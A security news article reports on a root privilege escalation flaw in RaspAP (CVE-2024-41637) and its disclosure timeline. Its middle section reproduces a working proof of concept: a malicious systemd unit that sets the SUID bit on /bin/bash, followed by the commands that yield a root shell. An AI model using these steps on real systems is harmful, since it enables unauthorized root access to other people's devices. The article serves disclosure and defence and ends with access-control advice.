RaspAP Vulnerability Allows Hackers to Gain Privileges on Raspberry Pi

A critical local privilege escalation vulnerability (CVE-2024-41637) was found in RaspAP, an open-source project for turning Raspberry Pi devices into wireless access points or routers. Rated 9.9 (Critical) on the CVSS scale, it affects versions before 3.1.5 and was publicly disclosed on July 27, 2024, after unsuccessful attempts to reach the RaspAP security team.

RaspAP Vulnerability

RaspAP is popular in educational settings, IoT applications, and among homelab enthusiasts for its simple web-based management of wireless networks.

The 0xZon report indicates that the vulnerability arises from inadequate access controls, allowing the www-data user to write to the restapi.service file and execute critical commands with sudo privileges without needing a password.

This flaw enables attackers to escalate their privileges from www-data to root, posing a significant security risk.

Security researcher Aaron Haymore, who identified the flaw, created a proof of concept (PoC) to demonstrate how it can be exploited.

The exploitation involves modifying the restapi.service file to run arbitrary code with root privileges. Here’s a brief outline of the process:

Edit the Service Configuration: As the www-data user, modify the restapi.service file located at /lib/systemd/system/restapi.service with the following configuration:

[Unit]
Description=Set SUID bit on /bin/bash
After=network.target

[Service]
Type=simple
ExecStart=/bin/bash -c ‘echo “Service started. Use systemctl to stop the service to set the SUID bit on /bin/bash.”‘
ExecStop=/bin/bash -c ‘chmod u+s /bin/bash’
Restart=always
RestartSec=1

[Install]
WantedBy=multi-user.target

Reboot the Machine: Execute sudo /sbin/reboot to restart the system and reload the daemon.
Start the Modified Service: After the reboot, use sudo /bin/systemctl start restapi.service to start the modified service.
Stop the Service: Stop the service with sudo /bin/systemctl stop restapi.service to set the SUID bit.
Gain Root Access: Run /bin/bash -p to obtain a root shell.

These steps show how an attacker can exploit the vulnerability to gain root access, highlighting the critical nature of this security flaw.

The vulnerability was reported to the RaspAP security team on July 16, 2024, with follow-ups on July 18, 23, and 26, but no response was received. It was publicly disclosed on July 27, 2024.

This incident underscores the critical importance of proper access controls and timely communication. Allowing low-privilege users to modify service files and use sudo without restrictions can lead to severe security breaches, including privilege escalation and arbitrary code execution.

To prevent such vulnerabilities, adhere to the following best practices for access control:

Implement the Principle of Least Privilege: Ensure users have only the minimal access necessary to perform their duties. Limit write permissions to service files to essential personnel only.
Audit and Restrict sudo Access: Regularly review sudoers configurations to ensure only trusted users can execute commands with elevated privileges. Avoid using broad NOPASSWD settings that could be exploited.
Secure Service Configurations: Protect critical service configurations and scripts from unauthorized modifications by using proper file permissions and ownership settings.
Monitoring and Logging: Implement comprehensive logging and monitoring to detect and alert on unauthorized changes or suspicious activities. Regularly review logs to identify potential exploitation attempts early.